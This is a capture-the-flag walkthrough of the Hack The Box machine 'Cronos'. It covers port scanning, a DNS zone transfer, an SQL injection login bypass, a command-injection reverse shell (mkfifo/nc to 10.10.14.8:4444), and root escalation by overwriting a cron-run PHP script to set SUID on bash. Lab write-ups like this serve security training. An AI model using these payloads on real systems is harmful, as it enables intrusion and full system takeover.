Cronos

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.13 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Jun 29 00:34:52 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

# Nmap done at Wed Jun 29 00:35:06 2022 -- 1 IP address (1 host up) scanned in 13.90 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,53,80 10.10.10.13 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Jun 29 00:35:23 2022 as: nmap -sCV -p22,53,80 -oN targeted 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 29 00:35:40 2022 -- 1 IP address (1 host up) scanned in 17.48 seconds

If we take a look at the website, we'll see the Apache2 default page with no much going on.

But, as port 53 (DNS) is open, we could get a domain name with nslookup.

nslookup

> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

And we get the ns1.cronos.htb domain name. Now that we know the domain name, we could try to get all the subdomains with dig.

dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 60 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Wed Jun 29 17:12:53 CEST 2022
;; XFR size: 7 records (messages 1, bytes 203)

Let's add the cronos.htb and the admin.cronos.htb domain names to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.13    cronos.htb    admin.cronos.htb

If now we take a look at the cronos.htb website, we'll see a CRONOS website with nothing interesting in it.

But, if we take a look at the admin.cronos.htb, we'll see a login panel.

Exploitation

I tried to bypass the login page with a basic SQL injection payload, logging in as the user ' or 1=1-- - and a random password.

And it worked.

From here we can execute traceroute or ping. So I tried to ping my local machine, and it worked.

It seems like the website is executing a command on the system. We could try to execute another command, after the ping command, which will send us a revere shell. First, let's start a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, if we select ping, and introduce the following payload, we should get a reverse shell as the www-data user, and we'll be able to grab the user flag.

;$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f)

listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.13] 45316
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/noulis/user.txt
115a1db22c9ec5497b1c7f5dd9816560

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we list the cronjobs available on the machine, we'll see that every minute, root is executing a PHP script.

cat /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#

If we take a look at the script permissions, we'll see that www-data is the owner, and we can modify it.

ls -l /var/www/laravel/artisan

-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan

We could put some PHP code that will give the /bin/bash the SUID permission, so we can execute it as the root user.

echo '<?php system("chmod u+s /bin/bash"); ?>' > /var/www/laravel/artisan

If now we wait for one minute, we'll see that now the bash binary has the SUID permission set.

ls -l /bin/bash

-rwsr-xr-x 1 root root 1037528 Jun 24  2016 /bin/bash

And finally, all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
f29ac94d898df107590adef9b2968361

Last updated

Was this helpful?